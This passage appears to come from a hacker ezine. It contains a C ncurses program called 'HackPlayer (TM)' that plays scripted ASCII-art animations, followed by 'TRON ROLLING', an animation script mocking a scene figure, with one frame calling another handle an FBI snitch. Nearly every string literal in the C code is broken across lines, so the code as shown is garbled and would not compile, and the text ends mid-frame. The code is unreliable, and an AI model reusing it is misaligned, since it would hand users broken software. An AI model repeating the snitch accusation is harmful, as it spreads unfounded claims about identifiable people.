int xrandom_set=0;
int xrandom=0;
int xsrandom=0;
int xurandom=0;

#define FRAME_VAL 2048
typedef struct frame {
off_t offb;
off_t offe;
} frame_t;

int frames_cur=0;
int frames_max=0;
frame_t * frames;

int frame_set=0;
int frame_clr=0;

typedef struct frame_indent {
off_t off;
int num;
int spaces;
} frame_indent_t;

frame_indent_t frame_indent;

int timeout_usleep=0;
int timeout_sleep =0;

WINDOW * win_main;

void screen_init(void)
{
initscr();
echo();
cbreak();
win_main = newwin(LINES, COLS, 0, 0);
//box(win_main,0,0);
scrollok(win_main, TRUE);
wrefresh(win_main);

return;
}


void screen_fini(void)
{
delwin(win_main);
endwin();
return;
}


void screen_set()
{
}


void handler_sig(int num)
{
if(num==SIGINT) {
(void)screen_fini();
exit(0);
}
return;
}


void playmovie_parse(FILE *fp, char * buf)
{
int x;

if(buf[0]=='#') return;

if(!strncasecmp(buf, "
FRAME_BEGIN", strlen("FRAME_BEGIN")))
{
// begin of a frame to print to screen
// FRAME_BEGIN <num> <linesdown>
if(frame_clr) wclear(win_main);

if(frame_indent.num)
{
frame_set = 1;
wmove(win_main, 0,0);
wrefresh(win_main);
return;
}

x=atoi(&buf[(strlen("
FRAME_BEGIN")+1)]);
if(x>frames_max) {
}
else
{
frames[x].offb = ftell(fp)-(strlen(buf)+strlen("
HACKPLAYEROPT:"));
}
if(!xrandom) {
frame_set = 1;
wmove(win_main, 0,0);
wrefresh(win_main);
}
else {
xrandom_set = 1;
wmove(win_main, 0,0);
wrefresh(win_main);
}
}
else if(!strncasecmp(buf, "
FRAME_END", strlen("FRAME_END")))
{
// end of a frame printed, move up to top
// FRAME_END <num>
if(frame_clr) wclear(win_main);
if(frame_indent.num)
{
if(fseek(fp, frame_indent.off, SEEK_SET)<0)
{
exit(-1);
}
bzero(&frame_indent,sizeof(frame_indent));
return;
}

x=atoi(&buf[(strlen("
FRAME_END")+1)]);
if(x>frames_max) {
}
else{
frames[x].offe = ftell(fp)-(strlen(buf)+strlen("
HACKPLAYEROPT:"));
}
if(!xrandom) {
frame_set = 0;
wmove(win_main,0,0);
}
else { xrandom_set = 0;
frame_set = 0;
wmove(win_main,0,0);
}
}
else if(!strncasecmp(buf, "
SLEEP", strlen("SLEEP")))
{
// sleep a certain amount of second
// SLEEP <seconds>
if(xrandom) return;
sleep(atoi(&buf[(strlen("
SLEEP")+1)]));
}
else if(!strncasecmp(buf, "
USLEEP", strlen("USLEEP")))
{
// usleep a certain amount of seconds
// USLEEP <useconds>
if(xrandom) return;
usleep(atoi(&buf[(strlen("
USLEEP")+1)]));
}
else if(!strncasecmp(buf, "
NLWRITE", strlen("NLWRITE")))
{
// write this msg to the screen (use a clear first if you want)
// NLWRITE <msg>
if(xrandom) return;
buf[strlen(buf)-1]='\0';
wprintw(win_main, "
%s\n", &buf[strlen("NLWRITE")+1]);
wrefresh(win_main);
}
else if(!strncasecmp(buf, "
CWRITE", strlen("CWRITE")))
{
// write the msg to the screen (no newlines)
// CWRITE <msg>
if(xrandom) return;
buf[strlen(buf)-1]='\0';
wprintw(win_main, "
%s", &buf[strlen("CWRITE")+1]);
wrefresh(win_main);
}
else if(!strncasecmp(buf, "
END", strlen("END")))
{
// end HackPlayer (TM)
// END
if(xrandom) return;
(void)screen_fini();
exit(0);
}
else if(!strncasecmp(buf, "
CLEAR", strlen("CLEAR")))
{
// clear the screen
// CLEAR
if(xrandom) return;
wclear(win_main);
wrefresh(win_main);
}
else if(!strncasecmp(buf, "
FRAME_REPLAY_SINGLE", strlen("FRAME_REPLAY_SINGLE")))
{
// replay a single frame x
// FRAME_REPLAY_SINGLE <num>
if(xrandom)return;
}
else if(!strncasecmp(buf, "
FRAME_REPLAY_FROMTO", strlen("FRAME_REPLAY_FROMTO")))
{
// replay a bunch of frames x-y
// FRAME_REPLAY_FROMTO <num>
if(xrandom)return;
}
else if(!strncasecmp(buf, "
RESTART", strlen("RESTART")))
{
// restart the movie begin at frame x
// RESTART <number>
if(xrandom)return;
x=atoi(&buf[(strlen("
RESTART")+1)]);
if(x>frames_max) {
}
else
{
if(fseek(fp, frames[x].offb, SEEK_SET)<0)
{
wprintw(win_main, "
fseek\n");
wrefresh(win_main);
(void)screen_fini();
exit(-1);
}
}
}
else if(!strncasecmp(buf, "
FRAME_INDENT", strlen("FRAME_INDENT")))
{
// display a frame, but indent it num spaces
// FRAME_INDENT <framenum> <spaces>
char * ptr_a, * ptr_b;
if(xrandom)return;
ptr_a=strtok(buf, "
");
if(ptr_a==NULL) return;
ptr_a=strtok(NULL, "
");
if(ptr_a==NULL) return;
ptr_b=strtok(NULL, "
");
if(ptr_b==NULL) return;
frame_indent.num = atoi(ptr_a);
frame_indent.spaces = atoi(ptr_b);
frame_indent.off = ftell(fp);
if(fseek(fp, frames[frame_indent.num].offb, SEEK_SET)<0)
{
exit(-1);
}
}
else if(!strncasecmp(buf, "
FRAME_CLEAR_ON", strlen("FRAME_CLEAR_ON")))
{
// clears win every frame
// FRAME_CLEAR_ON
frame_clr=1;
}
else if(!strncasecmp(buf, "
FRAME_CLEAR_OFF", strlen("FRAME_CLEAR_OFF")))
{
// doesnt clear
// FRAME_CLEAR_OFF
frame_clr=0;
}
else if(!strncasecmp(buf, "
TIMEOUT_USLEEP", strlen("TIMEOUT_USLEEP")))
{
// set the global usleep val
// TIMEOUT_USLEEP <val>
timeout_usleep=atoi(&buf[(strlen("
TIMEOUT_USLEEP")+1)]);
}
else if(!strncasecmp(buf, "
TIMEOUT_SLEEP", strlen("TIMEOUT_SLEEP")))
{
// set the global timeout_sleep val
// TIMEOUT_SLEEP <val>
if(xrandom) return;
timeout_sleep=atoi(&buf[(strlen("
TIMEOUT_SLEEP")+1)]);
}
else if(!strncasecmp(buf, "
TUSLEEP" ,strlen("TUSLEEP")))
{
// uses timeout_usleep
// TUSLEEP
if(xrandom)return;
if(timeout_usleep>0)
usleep(timeout_usleep);
}
else if(!strncasecmp(buf, "
TSLEEP",strlen("TSLEEP")))
{
// uses timeout_sleep
// TSLEEP
if(xrandom)return;
if(timeout_sleep>0)sleep(timeout_sleep);
}
else if(!strncasecmp(buf, "
TUWRITE", strlen("TUWRITE")))
{
if(xrandom)return;
if(timeout_usleep>0)
{
int myx;
for(myx=0;myx<strlen(&buf[strlen("
TUWRITE")+1]);myx++)
{
wprintw(win_main, "
%c", buf[(strlen("TUWRITE")+1)+myx]);
wrefresh(win_main);
usleep(timeout_usleep);
}
}
}
else if(!strncasecmp(buf, "
SRANDOM", strlen("SRANDOM")))
{
// randomly displays frames, only frames like FRAME_BEGIN, no indent
// SRANDOM <timeval> timeval is how often it randomly displays in seconds
xsrandom = atoi(&buf[(strlen("
SRANDOM")+1)]);
xrandom=1;
}
else if(!strncasecmp(buf, "
URANDOM", strlen("URANDOM")))
{
// randomly displays frames, only frames like FRAME_BEGIN, no indent
// URANDOM <timeval> timeval is how often it randomly displays in usecs
xurandom = atoi(&buf[(strlen("
URANDOM")+1)]);
xrandom=1;
}
else {
}

return;
}


void playmovie(FILE * fp)
{
char buf[1024+1];

if(fp==NULL) {
(void)screen_fini();
exit(-1);
}
for(;;)
{
bzero(&buf,sizeof(buf));
if(fgets(buf,sizeof(buf),fp)==NULL) break;

// parse here
if(!strncasecmp(buf, "
HACKPLAYEROPT", strlen("HACKPLAYEROPT")))
{
playmovie_parse(fp, &buf[(strlen("
HACKPLAYEROPT")+1)]);
}
else {
if(frame_set==1)
{
if(frame_indent.num)
{
int myx;
for(myx=0;myx<frame_indent.spaces;myx++)
{
wprintw(win_main, "
");
wrefresh(win_main);
}
}
wprintw(win_main, "
%s", buf);
wrefresh(win_main);
}
}
// end parse
}

if(xrandom)
{
// do your thang
int icnt=0,i;
frame_t * myframes;

myframes=(frame_t *)malloc((frames_max+1)*sizeof(frame_t));
if(myframes==NULL){
perror("
malloc");
exit(-1);
}
for(i=0;i<frames_max;i++)
{
if(frames[i].offe)
{
myframes[icnt].offb = frames[i].offb;
myframes[icnt].offe = frames[i].offe;
icnt++;
}
}
for(;;)
{
if(xrandom_set==0) {
i=rand()%icnt;
if(fseek(fp, myframes[i].offb, SEEK_SET)<0)
{
perror("
fseek");
exit(-1);
}
}
fgets(buf,sizeof(buf), fp);
if(!strncasecmp(buf, "
HACKPLAYEROPT", strlen("HACKPLAYEROPT")))
{
playmovie_parse(fp, &buf[(strlen("
HACKPLAYEROPT")+1)]);
}
if(xrandom_set&&strncasecmp(buf, "
HACKPLAYEROPT", strlen("HACKPLAYEROPT")))
{
wprintw(win_main, "
%s", buf);
wrefresh(win_main);
}
if(xrandom_set==0) {
if(xsrandom) sleep(xsrandom);
if(xurandom) usleep(xurandom);
}
}
}

return;
}


int main(int argc, char *argv[])
{
FILE * fp;
char * hackfile;


frames = (frame_t *) malloc((FRAME_VAL+1)*sizeof(frame_t));
if(frames==NULL)
{
perror("
malloc");
exit(-1);
}
frames_max=FRAME_VAL;
bzero(frames, frames_max*sizeof(frame_t));
frames_cur=0;

if(argc < 2) {
puts("
run HackPlayer (TM) like so: ./HackPlayer(TM) ./hackfile");
exit(-1);
}
hackfile=argv[1];

fp=fopen(hackfile, "
r");
if(fp==NULL) {
perror("
fopen");
exit(-1);
}

signal(SIGINT, handler_sig);
(void)screen_init();
(void)playmovie(fp);
(void)screen_fini();

return(0);
}
[END_CUT] playonplaya.c
[CUT_HERE] TRON_ROLLING.hp
# (TM) (C) (R)
# TRON ROLLING, A ~el8 FILM
# Directed by:
# SiLLY G00S3 & PoonTar
#
# FILM LENGTH: 2 minutes 12 seconds
# FILM TYPE: Made to run on the HackPlayer (TM)
# (TM) (C) (R)
#HACKPLAYEROPT:SRANDOM 1
#HACKPLAYEROPT:FRAME_CLEAR_ON
HACKPLAYEROPT:TIMEOUT_USLEEP 150000
HACKPLAYEROPT:NLWRITE .HackPlayer (TM)
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:NLWRITE .
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:NLWRITE .
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:TUWRITE ~el8
HACKPLAYEROPT:TUWRITE MOTION
HACKPLAYEROPT:TUWRITE PICTURES
HACKPLAYEROPT:TUWRITE PRESENTS!
HACKPLAYEROPT:NLWRITE .
HACKPLAYEROPT:CWRITE T
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:CWRITE R
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:CWRITE O
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:NLWRITE N
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:CWRITE R
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:CWRITE O
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:CWRITE L
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:CWRITE L
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:CWRITE I
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:CWRITE N
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:NLWRITE G
HACKPLAYEROPT:NLWRITE .
HACKPLAYEROPT:TUWRITE DIRECTED
HACKPLAYEROPT:TUWRITE by:
HACKPLAYEROPT:TUWRITE ~EL8 TEAM INC.
HACKPLAYEROPT:NLWRITE .
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:NLWRITE .
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:NLWRITE .HackPlayer (TM)
HACKPLAYEROPT:SLEEP 2
HACKPLAYEROPT:CLEAR
HACKPLAYEROPT:SLEEP 1
HACKPLAYEROPT:FRAME_BEGIN 10
,i$$$i.
$$$$$$$
#$$$$$# *hi, my name is TR0N*
`$$$'
$$$
|$$$eeeeee
,i$ |$$$$$$$$$
,!$$$ |$$$
$$$# |$$$$$$$$$$$i.
;$$$' ~~~~~~~~~$$$i. ,i
($$$. `$$$i.i$'
(#$$!. `!$$$!
`#$$!. ,!$W! `V'
`#$$Wi!. ,!iW$$#'
`##$$$$$$$$$##'
`!#####!'
HACKPLAYEROPT:FRAME_END 10
HACKPLAYEROPT:SLEEP 3
HACKPLAYEROPT:FRAME_BEGIN 11
,i$$$i.
$$$$$$$
#$$$$$# *i run an ezine called dSh, i bother everyone on IRC*
`$$$'
$$$
|$$$eeeeee
,i$ |$$$$$$$$$
,!$$$ |$$$
$$$# |$$$$$$$$$$$i.
;$$$' ~~~~~~~~~$$$i. ,i
($$$. `$$$i.i$'
(#$$!. `!$$$!
`#$$!. ,!$W! `V'
`#$$Wi!. ,!iW$$#'
`##$$$$$$$$$##'
`!#####!'
HACKPLAYEROPT:FRAME_END 11
HACKPLAYEROPT:SLEEP 3
HACKPLAYEROPT:FRAME_BEGIN 12
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
'$$$eeee..
,i$ |$$$$$$$$$$.
,!$$$ |$$$
$$$# |$$$$$$$$$$$i.
;$$$' ~~~~~~~~~$$$i. ,i
($$$. `$$$i.i$'
(#$$!. `!$$$!
`#$$!. ,!$W! `V'
`#$$Wi!. ,!iW$$#'
`##$$$$$$$$$##'
`!#####!'
HACKPLAYEROPT:FRAME_END 12
HACKPLAYEROPT:USLEEP 80000
HACKPLAYEROPT:FRAME_BEGIN 13
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$ .eee
'$$$eee$$$$ee.
,i|$$$$$$~~
,!$$$ |$$$
$$$# |$$$$$$$$$$i.
;$$$' ~~~~~~ $$$$i. ,i
($$$. *FART* `$$$i.i$'
(#$$!. $i `!$$$!
`#$$!. ,!$W! `V'
`#$$Wi!. ,!iW$$#'
`##$$$$$$$$$##'
`!#####!'
HACKPLAYEROPT:FRAME_END 13
HACKPLAYEROPT:USLEEP 750000
HACKPLAYEROPT:FRAME_BEGIN 130
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$ .eee
'$$$eee$$$$ee.
,i|$$$$$$~~
,!$$$ |$$$
$$$# |$$$$$$$$$$i.
;$$$' ~~~~~~ $$$$i. ,i
($$$. *FART* `$$$i.i$'
(#$$!. $i `!$$$!
`#$$!. ,!$W! `V'
`#$$Wi!. ,!iW$$#'
`##$$$$$$$$$##'
`!#####!'
HACKPLAYEROPT:FRAME_END 130
HACKPLAYEROPT:USLEEP 250000
HACKPLAYEROPT:FRAME_BEGIN 14
,i$$$i.
$$$$$$$
#$$$$$#
`$$$' ..
$$$ .ee$$$
'$$$ee$$$e'
,i|$$$$''
,!$$$ |$$$
$$$# |$$$$$$$$$$i.
;$$$' ~~~~~~ $$$$i. ,i
($$$. *FART* `$$$i .i$'
(#$$!. $i `!$$$!
`#$$!. ,!$W! `V'
`#$$Wi!. ,!iW$$#'
`##$$$$$$$$$##'
`!#####!'

HACKPLAYEROPT:FRAME_END 14
HACKPLAYEROPT:USLEEP 100000
HACKPLAYEROPT:FRAME_BEGIN 15
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$ .eee
'$$$eee$$$$ee.
,i|$$$$$$~~
,!$$$ |$$$
$$$# |$$$$$$$$$$i.
;$$$' ~~~~~~ $$$$i. ,i
($$$. *FART* `$$$i.i$'
(#$$!. $i `!$$$!
`#$$!. ,!$W! `V'
`#$$Wi!. ,!iW$$#'
`##$$$$$$$$$##'
`!#####!'
HACKPLAYEROPT:FRAME_END 15
HACKPLAYEROPT:USLEEP 400000
HACKPLAYEROPT:FRAME_BEGIN 16
,i$$$i.
$$$$$$$
#$$$$$#
`$$$' ..
$$$ .ee$$$
'$$$ee$$$e'
,i|$$$$''
,!$$$ |$$$
$$$# |$$$$$$$$$$i.
;$$$' ~~~~~~ $$$$i. ,i
($$$. *FART* `$$$i .i$'
(#$$!. $i `!$$$!
`#$$!. ,!$W! `V'
`#$$Wi!. ,!iW$$#'
`##$$$$$$$$$##'
`!#####!'
HACKPLAYEROPT:FRAME_END 16
HACKPLAYEROPT:USLEEP 400000
HACKPLAYEROPT:FRAME_INDENT 15 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_BEGIN 17
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
'$$$eeee..
,i$ |$$$$$$$$$$.
,!$$$ |$$$
$$$# |$$$$$$$$$$$i.
;$$$' ~~~~~~~~~$$$i. ,i
($$$. `$$$i.i$'
(#$$!. `!$$$!
`#$$!. ,!$W! `V'
`#$$Wi!. ,!iW$$#'
`##$$$$$$$$$##'
`!#####!'
HACKPLAYEROPT:FRAME_END 17
HACKPLAYEROPT:USLEEP 80000
HACKPLAYEROPT:FRAME_BEGIN 20
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$eeeeee
,i$ |$$$$$$$$$
,!$$$ |$$$
$$$# |$$$$$$$$$$$i.
;$$$' ~~~~~~~~~$$$i. ,i
($$$. `$$$i.i$'
(#$$!. `!$$$!
`#$$!. ,!$W! `V'
`#$$Wi!. ,!iW$$#'
`##$$$$$$$$$##'
`!#####!'
HACKPLAYEROPT:FRAME_END 20
HACKPLAYEROPT:SLEEP 1
HACKPLAYEROPT:FRAME_BEGIN 21
,i$$$i.
$$$$$$$
#$$$$$# *i will now demonstrate how I roll in my chair while irc'n*
`$$$'
$$$
|$$$eeeeee
,i$ |$$$$$$$$$
,!$$$ |$$$
$$$# |$$$$$$$$$$$i.
;$$$' ~~~~~~~~~$$$i. ,i
($$$. `$$$i.i$'
(#$$!. `!$$$!
`#$$!. ,!$W! `V'
`#$$Wi!. ,!iW$$#'
`##$$$$$$$$$##'
`!#####!'
HACKPLAYEROPT:FRAME_END 21
HACKPLAYEROPT:SLEEP 3
HACKPLAYEROPT:FRAME_INDENT 20 0
HACKPLAYEROPT:USLEEP 500000
HACKPLAYEROPT:FRAME_BEGIN 22
,i$$$i.
$$$$$$$
#$$$$$# *mastry0da iz an fbi sn1tch*
`$$$'
$$$
|$$$eeeeee
,i$ |$$$$$$$$$
,!$$$ |$$$
$$$# |$$$$$$$$$$$i.
;$$$' ~~~~~~~~~$$$i. ,i
($$$. `$$$i.i$'
(#$$!. `!$$$!
`#$$!. ,!$W! `V'
`#$$Wi!. ,!iW$$#'
`##$$$$$$$$$##'
`!#####!'
HACKPLAYEROPT:FRAME_END 22
HACKPLAYEROPT:SLEEP 2
HACKPLAYEROPT:FRAME_INDENT 20 0
HACKPLAYEROPT:USLEEP 500000
HACKPLAYEROPT:FRAME_BEGIN 23
,i$$$i.
$$$$$$$
#$$$$$# *BURP*
`$$$'
$$$
|$$$eeeeee
,i$ |$$$$$$$$$
,!$$$ |$$$
$$$# |$$$$$$$$$$$i.
;$$$' ~~~~~~~~~$$$i. ,i
($$$. `$$$i.i$'
(#$$!. `!$$$!
`#$$!. ,!$W! `V'
`#$$Wi!. ,!iW$$#'
`##$$$$$$$$$##'
`!#####!'
HACKPLAYEROPT:FRAME_END 23
HACKPLAYEROPT:SLEEP 1
HACKPLAYEROPT:FRAME_INDENT 20 0
HACKPLAYEROPT:USLEEP 80000
HACKPLAYEROPT:FRAME_BEGIN 24
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$e.
,i$ |$$$$$$e.
,!$$$ |$$$ '$$$$'
$$$# |$$$$$$$$$$$i.
;$$$' ~~~~~~~~~$$$i. ,i
($$$. `$$$i.i$'
(#$$!. `!$$$!
`#$$!. ,!$W! `V'
`#$$Wi!. ,!iW$$#'
`##$$$$$$$$$##'
`!#####!'
HACKPLAYEROPT:FRAME_END 24
HACKPLAYEROPT:USLEEP 80000
HACKPLAYEROPT:FRAME_BEGIN 100
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$.
|$$$e.
,i$ |$$$$$
,!$$$ |$$$$$|
$$$# |$$$$$$$$$$$i.
;$$$' ~~~$$$~~~$$$i. ,i
($$$. ||| `$$$i.i$'
(#$$!. `!$$$!
`#$$!. ,!$W! `V'
`#$$Wi!. ,!iW$$#'
`##$$$$$$$$$##'
`!#####!'
HACKPLAYEROPT:FRAME_END 100
HACKPLAYEROPT:USLEEP 80000
HACKPLAYEROPT:FRAME_BEGIN 101
,i$$$i.
$$$$$$$
#$$$$$#
$$$'
$$$
|$$$e.
,i$ |$$$$.
,!$$$ |$$$$$.
$$$# |$$$$$$$$$$$i.
;$$$' ~$$$~~~~~$$$i. ,i
($$$. ||| `$$$i.i$'
(#$$!. `!$$$!
`#$$!. ,!$W! `V'
`#$$Wi!. ,!iW$$#'
`##$$$$$$$$$##'
`!#####!'
HACKPLAYEROPT:FRAME_END 101
HACKPLAYEROPT:USLEEP 120000
HACKPLAYEROPT:FRAME_INDENT 100 1
HACKPLAYEROPT:USLEEP 80000
HACKPLAYEROPT:FRAME_INDENT 101 2
HACKPLAYEROPT:USLEEP 120000
HACKPLAYEROPT:FRAME_INDENT 100 4
HACKPLAYEROPT:USLEEP 80000
HACKPLAYEROPT:FRAME_INDENT 101 5
HACKPLAYEROPT:USLEEP 120000
HACKPLAYEROPT:FRAME_INDENT 100 7
HACKPLAYEROPT:USLEEP 80000
HACKPLAYEROPT:FRAME_INDENT 101 8
HACKPLAYEROPT:USLEEP 120000
HACKPLAYEROPT:FRAME_INDENT 100 10
HACKPLAYEROPT:USLEEP 80000
HACKPLAYEROPT:FRAME_INDENT 101 11
HACKPLAYEROPT:USLEEP 120000
HACKPLAYEROPT:FRAME_INDENT 100 13
HACKPLAYEROPT:USLEEP 80000
HACKPLAYEROPT:FRAME_INDENT 101 14
HACKPLAYEROPT:USLEEP 120000
HACKPLAYEROPT:FRAME_INDENT 24 16
HACKPLAYEROPT:USLEEP 80000
HACKPLAYEROPT:TIMEOUT_USLEEP 80000
HACKPLAYEROPT:FRAME_BEGIN 112
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$eeeee,
,i$ |$$$$$$$$$i.
,!$$$ |$$$
$$$# |$$$$$$$$$$$i.
;$$$' ~~~~~~~~~$$$i. ,i
($$$. `$$$i.i$'
(#$$!. `!$$$!
`#$$!. ,!$W! `V'
`#$$Wi!. ,!iW$$#'
`##$$$$$$$$$##'
`!#####!'
HACKPLAYEROPT:FRAME_END 112
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_BEGIN 110
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$eeeeee *clickedyclick*
,i$ |$$$$$$$$$
,!$$$ |$$$
$$$# |$$$$$$$$$$$i.
;$$$' ~~~~~~~~~$$$i. ,i
($$$. `$$$i.i$'
(#$$!. `!$$$!
`#$$!. ,!$W! `V'
`#$$Wi!. ,!iW$$#'
`##$$$$$$$$$##'
`!#####!'
HACKPLAYEROPT:FRAME_END 110
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 110 0
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 110 2
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 110 4
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 110 5
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 110 6
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 110 7
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_BEGIN 111
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$
|$$$eeeeee *clickedyclick*
,i$ |$$$$$$$$$
,!$$$ |$$$
$$$# |$$$$$$$$$$$i.
;$$$' ~~~~~~~~~$$$i. ,i
($$$. `$$$i.i$'
(#$$!. `!$$$!
`#$$!. ,!$W!`V'
`#$$Wi!. ,!iW$$#'
`##$$$$$$$$$##'
`!#####!'
HACKPLAYEROPT:FRAME_END 111
HACKPLAYEROPT:USLEEP 50000
HACKPLAYEROPT:FRAME_INDENT 110 7
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 110 6
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 110 5
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 110 4
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 110 3
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 110 2
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 110 1
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 110 0
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 112 0
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 24 14
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 24 13
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 24 12
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 24 11
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 24 10
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 24 9
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 24 8
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 24 7
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 24 6
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 24 5
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 24 4
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 24 3
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 24 2
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 24 1
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_INDENT 12 0
HACKPLAYEROPT:TUSLEEP
HACKPLAYEROPT:FRAME_BEGIN 200
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$ .eee
'$$$eee$$$$ee
|$$$$$$~~
,!$$$ |$$$
$$$# |$$$$$$$$$$i.
;$$$' ~~~~~~ $$$$i. ,i
($$$. `$$$i.i$'
(#$$!. $i `!$$$!
`#$$!. ,!$W! `V'
`#$$Wi!. ,!iW$$#'
`##$$$$$$$$$##'
`!#####!'
HACKPLAYEROPT:FRAME_END 200
HACKPLAYEROPT:SLEEP 1
HACKPLAYEROPT:FRAME_BEGIN 201
,i$$$i.
$$$$$$$ **AARRGHH**
#$$$$$#
`$$$'
$$$ .eee
'$$$eee$$$$ee
|$$$$$$~~
,!$$$ |$$$
$$$# |$$$$$$$$$$i.
;$$$' ~~~~~~ $$$$i. ,i
($$$. `$$$i.i$'
(#$$!. $i `!$$$!
`#$$!. ,!$W! `V'
`#$$Wi!. ,!iW$$#'
`##$$$$$$$$$##'
`!#####!'
HACKPLAYEROPT:FRAME_END 201
HACKPLAYEROPT:SLEEP 2
HACKPLAYEROPT:FRAME_INDENT 200 0
HACKPLAYEROPT:USLEEP 500000
HACKPLAYEROPT:FRAME_BEGIN 202
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$ ee$e.
'$$$eee$$$ee
|$$$$$$~
,!$$$ |$$$
$$$# |$$$$$$$$$$i.
;$$$' ~~~~~~ $$$$i. ,i
($$$. `$$$i.i$'
(#$$!. $i `!$$$!
`#$$!. ,!$W! `V'
`#$$Wi!. ,!iW$$#'
`##$$$$$$$$$##'
`!#####!'
HACKPLAYEROPT:FRAME_END 202
HACKPLAYEROPT:USLEEP 600000
HACKPLAYEROPT:FRAME_BEGIN 203
,i$$$i.
$$$$$$$
#$$$$$#
`$$$' ee.
$$$ .e$e
'$$$ee$$e
|$$$$$'
,!$$$ |$$$
$$$# |$$$$$$$$$$i.
;$$$' ~~~~~~ $$$$i. ,i
($$$. `$$$i. i$'
(#$$!. $i `!$$$!
`#$$!. ,!$W! `V'
`#$$Wi!. ,!iW$$#'
`##$$$$$$$$$##'
`!#####!'
HACKPLAYEROPT:FRAME_END 203
HACKPLAYEROPT:USLEEP 600000
HACKPLAYEROPT:FRAME_INDENT 202 0
HACKPLAYEROPT:USLEEP 400000
HACKPLAYEROPT:FRAME_INDENT 203 0
HACKPLAYEROPT:USLEEP 400000
HACKPLAYEROPT:FRAME_BEGIN 210
,i$$$i.
$$$$$$$ *SUM1 HELP?!*
#$$$$$#
`$$$'
$$$ .eee
'$$$eee$$$$ee
|$$$$$$~~
,!$$$ |$$$
$$$# |$$$$$$$$$$i.
;$$$' ~~~~~~ $$$$i. ,i
($$$. `$$$i.i$'
(#$$!. $i `!$$$!
`#$$!. ,!$W! `V'
`#$$Wi!. ,!iW$$#'
`##$$$$$$$$$##'
`!#####!'
HACKPLAYEROPT:FRAME_END 210
HACKPLAYEROPT:SLEEP 2
HACKPLAYEROPT:FRAME_INDENT 202 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 203 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 202 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 203 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 202 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_INDENT 203 0
HACKPLAYEROPT:USLEEP 200000
HACKPLAYEROPT:FRAME_BEGIN 220
,i$$$i.
$$$$$$$
#$$$$$#
`$$$'
$$$ .eee
'$$$eee$$$$ee
|$$$$$$~~
,!$$$ |$$$
$$$# |$$$$$$$$$$i. ,i
